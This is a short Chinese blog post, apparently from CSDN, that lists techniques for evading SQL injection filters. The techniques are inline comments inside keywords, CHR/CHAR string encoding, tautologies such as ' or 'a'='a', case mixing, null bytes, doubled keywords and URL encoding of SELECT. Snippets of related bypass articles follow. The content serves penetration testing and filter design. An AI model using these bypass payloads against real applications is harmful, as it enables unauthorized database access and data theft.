sql注入绕过的一些方法

最新推荐文章于 2024-07-30 10:50:29 发布
最新推荐文章于 2024-07-30 10:50:29 发布
阅读量1.4k 收藏
点赞数
分类专栏: 互联网安全 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/syh_486_007/article/details/71156725
版权

1. 使用注释,例如:

    SELECT/*foo*/username,password/*foo*/FROM/*foo*/users

    在MySQL中甚至可以在关键字中间插入注释,例如SEL/*foo*/ECT username,password FR/*foo*/OM users


2. 避免使用关键词,例如:

 select ename, sal from emp where ename=’marcus’ :可以改写成如下形式:
SELECT ename, sal FROM emp where ename=CHR(109)||CHR(97)||CHR(114)||CHR(99)||CHR(117)||CHR(115)

或者:SELECT ename, sal FROM emp WHERE ename=CHAR(109)+CHAR(97)+CHAR(114)+CHAR(99)+CHAR(117)+CHAR(115)


3.如果sql语句注释(--)被过滤,那么可以构造注入数据,使得注入数据后,sql语句语法还是正确的,例如如果不能注入 ' or 1=1 -- ,那么可以构造 ' or 'a'='a' 


4. 避免使用简单确认,一些输入确认机制通过黑名单的方式来避免sql注入,当输入的内容包含关键词的时候就过滤掉,这个时候可以尝试使用如下方式:

SeLeCt
%00SELECT
SELSELECTECT
%53%45%4c%45%43%54
%2553%2545%254c%2545%2543%2554
二进制程序猿
关注
专栏目录
23-3 绕过过滤 and 和 or 的 SQL注入
weixin_43263566的博客
02-03 331
在深入了解SQL注入等数据库安全话题之前,掌握一些MySQL数据库的基础知识是很重要的。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入绕开过滤的常用方法
u012684933的专栏
03-05 7831
1. 使用注释,例如:     SELECT/*foo*/username,password/*foo*/FROM/*foo*/users     在mysql中甚至可以在关键字中间插入注释,例如SEL/*foo*/ECT username,password FR/*foo*/OM users 2. 避免使用关键词,例如:  select ename, sal from emp w
【WAF BYPASS】SQL注入漏洞之WAF绕过方式探索(万种)
最新发布
weixin_70940440的博客
07-30 2000
但这只是一种简单的防护措施。(注意:在 SQL 中,XOR(异或)运算符用于比较两个布尔表达式,如果两个表达式的结果不同(一个为真,一个为假),则XOR的结果为真;外部的查询SELECT * FROM users WHERE age > (子查询的结果) :从users表中选择所有年龄大于子查询计算出的平均年龄的记录,并返回所有列( * 表示所有列)。CHAR(101) 对应字符 'e',CHAR(97) 对应字符 'a',CHAR(115) 对应字符 's',CHAR(116) 对应字符 't'。
sql注入——避开过滤
weixin_34072637的博客
09-19 264
有的时候,很容易受到SQL注入***的程序,可能会进行输入过滤,用来防止***者无限制的利用其中存在的设计缺陷。 唱出会删除或者净化一些字符,或者阻止常用的sql关键词。 我们通常有以下几种技巧,去避开这些过滤。 1,避免使用被阻止的字符,即不使用这些字符仍然达到***目的。 A,如果注入一个数字数据字段,就不需要使用单引号。 B,输入注释符号被阻止使用,我们可以设...
SQL注入过滤限制绕过方法
weixin_30879169的博客
04-28 1231
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete ...
sql注入过滤与绕过
designer545的博客
07-13 1159
在一些网站,管理员会通过一些正则表达式来使过滤一些语句 此时,就要通过一些绕过方法绕过过滤进行查询。 一、通过注释符绕过 注释符 # // 通过在关键词的中间加入注释符,使关键词不被识别 如 select 改为 se//lect 二、通过<>绕过 如 select 改为 sel<>ect 三、通过改变大小写绕过 四、如果and or被过滤 可以将and 用&& 替换 or 用 || 替换 五、通过重复关键词绕过 六、通过url编码绕过 七、等价函数与命令
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL防注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
过滤逗号是安全领域常见的一种防御SQL注入方法,因为SQL语句中逗号通常用于分隔不同的数据列。然而,有经验的攻击者能够通过各种技巧绕过这些过滤措施。在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行...
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
渗透之——SQL注入绕过技术总结
冰河的专栏
01-05 4679
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85869703 1.绕过空格(注释符/* */,%a0) 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用...
SQL注入过滤的绕过
谢公子的博客
07-26 5722
在实际的项目开发中,程序猿一般都会使用函数过滤一些字符,以达到防止SQL注入。譬如,下面的php代码使用 preg_replace函数过滤了一些字符 preg_replace('A' , 'B' , C):执行一个正则表达式的搜索和替换,这个的意思是搜索C中符合A的部分,然后用B来代替。 有关这个函数更多的详情:preg_replace函数详解 过滤了字符我们就注入不了了吗?no ,...
SQL注入 绕过and和or过滤
阿坤的博客
12-10 2523
SQL注入 绕过and和or过滤 1.基础知识介绍 1.MySQL中的大小写不敏感,大写与小写一样。 2.MySQL中的十六进制与URL编码 3.符号和关键字替换and – &&、or–|| 4.内联注释与多行注释 /*! 内联注释*/ 1 ...
SQL注入时 and or 被过滤解决方式
m0_62207482的博客
03-14 684
大小写变形 编码 添加注释 双写法 利用符号形式 浮点数 #数字被注释 函数替代 #符号被注释
SQL注入时当and、or等字符被过滤了怎么办
热门推荐
weixin_40950781的博客
08-25 1万+
SQL注入时and、or被过滤了怎么办当常用字符被注释无法使用时,通常采取以下方法(可自行搜索sql注入绕开过滤等):0x01字母被注释(or、and等)1. 大小写变形2. 改变编码3. 添加注释4. 往字符里面插入被过滤的字符(双写法)5.利用符号形式0x02数字被注释(1、2等)6. 使用浮点数0x03 符号被注释(<、>等)7. 利用函数代替 当常用字符被注释无法使用时,通常采...
常见 SQL 注入绕过方法
Flag少侠的博客
04-25 1973
Web应用通常会使用输入过滤器,设计这些过滤器的目的是防御包括SOL 注入在内的常见攻击。这些过滤器可能位于应用的代码中(自定义输入验证方式),也可能在应用外部实现,形式为 Web应用防火墙(WAF)或入侵防御系统(IPS)
(手工)【sqli-labs25-25a】报错注入、OR&AND过滤后注入
07-12 969
【SQL-过滤后注入】
SQL注入绕过技巧:新手实用的避开WAF方法
本文将介绍几种常见的SQL注入绕过技术,包括但不限于: 1. **绕过Web应用防火墙(WAF)**: SQL注入攻击通常会被WAF检测和拦截,但通过巧妙构造查询,可以利用特殊字符或函数绕过这些安全机制。例如,利用加号`+`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值